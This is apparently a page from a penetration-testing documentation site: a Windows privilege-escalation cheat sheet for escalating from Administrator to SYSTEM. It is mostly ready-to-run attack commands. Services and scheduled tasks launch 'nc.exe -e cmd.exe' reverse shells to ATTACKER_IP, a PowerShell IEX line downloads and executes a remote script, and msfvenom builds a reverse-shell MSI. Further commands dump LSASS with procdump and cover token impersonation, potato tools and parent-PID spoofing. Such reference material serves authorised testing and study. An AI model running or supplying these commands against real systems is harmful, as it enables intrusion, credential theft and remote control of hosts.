> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# From High to SYSTEM

> Escalating from Administrator (high integrity) to NT AUTHORITY\SYSTEM: new service, PsExec, scheduled tasks, and token manipulation.

## Overview

High integrity (local admin) is not SYSTEM. Some post-exploitation tasks require SYSTEM — dumping LSASS, accessing certain registry hives, or interacting with services. Multiple paths to escalate.

***

## Create New Service

```cmd theme={"dark"}
sc create EvilService binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" start= auto
sc start EvilService
```

Or for a command:

```cmd theme={"dark"}
sc create EvilService binpath= "cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc start EvilService
```

Cleanup:

```cmd theme={"dark"}
sc delete EvilService
```

***

## PsExec

Sysinternals PsExec with `-s` flag runs as SYSTEM.

```cmd theme={"dark"}
PsExec64.exe -accepteula -s -i cmd.exe
```

Interactive SYSTEM shell:

```cmd theme={"dark"}
PsExec64.exe -accepteula -s -i powershell.exe
```

Remote SYSTEM:

```cmd theme={"dark"}
PsExec64.exe -accepteula -s \\TARGET cmd.exe
```

***

## Scheduled Task

```cmd theme={"dark"}
schtasks /create /tn "EvilTask" /tr "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "EvilTask"
```

Cleanup:

```cmd theme={"dark"}
schtasks /delete /tn "EvilTask" /f
```

***

## Named Pipes — Meterpreter getsystem

Meterpreter automates named pipe impersonation:

```
meterpreter > getsystem
```

Three techniques:

1. Named pipe impersonation (default)
2. Token duplication
3. Named pipe impersonation (RPCSS variant)

***

## Token Manipulation

### Incognito (Meterpreter)

```
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
```

### PowerShell — Invoke-TokenManipulation

```powershell theme={"dark"}
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-TokenManipulation.ps1')
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
```

***

## DLL Hijacking on SYSTEM Service

If a SYSTEM service loads DLL from writable path:

1. Find writable DLL path (see [Service Exploits](/windows-privesc/service-exploits))
2. Drop malicious DLL
3. Restart service → executes as SYSTEM

***

## AlwaysInstallElevated → SYSTEM

If enabled, MSI installs as SYSTEM:

```bash theme={"dark"}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi -o shell.msi
```

```cmd theme={"dark"}
msiexec /quiet /qn /i shell.msi
```

See [Misconfigurations](/windows-privesc/misconfigurations).

***

## SeImpersonate → SYSTEM

If high integrity process has SeImpersonatePrivilege:

```cmd theme={"dark"}
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
```

See [Potato Attacks](/windows-privesc/potatoes).

***

## SeDebug + SeImpersonate

With both privileges, migrate into SYSTEM process:

```cmd theme={"dark"}
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

Or via Meterpreter:

```
meterpreter > ps
meterpreter > migrate <SYSTEM_PID>
```

***

## Parent PID Spoofing

Create process with SYSTEM process as parent:

```powershell theme={"dark"}
$parent = Get-Process -Name "winlogon" | Select -First 1
# Use NtCreateProcess or CreateProcess with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
```

Tools:

```bash theme={"dark"}
https://github.com/decoder-it/psgetsystem
```

```powershell theme={"dark"}
Import-Module .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent((Get-Process winlogon).Id, "cmd.exe", "")
```

***

## Quick Reference

| Method                | Requires               | Complexity |
| --------------------- | ---------------------- | ---------- |
| PsExec -s             | Admin + PsExec on disk | Low        |
| New service           | Admin                  | Low        |
| Scheduled task        | Admin                  | Low        |
| Meterpreter getsystem | Meterpreter session    | Low        |
| Token manipulation    | Admin + tool           | Medium     |
| Parent PID spoofing   | Admin + SeDebug        | Medium     |
| Potato attacks        | SeImpersonate          | Medium     |
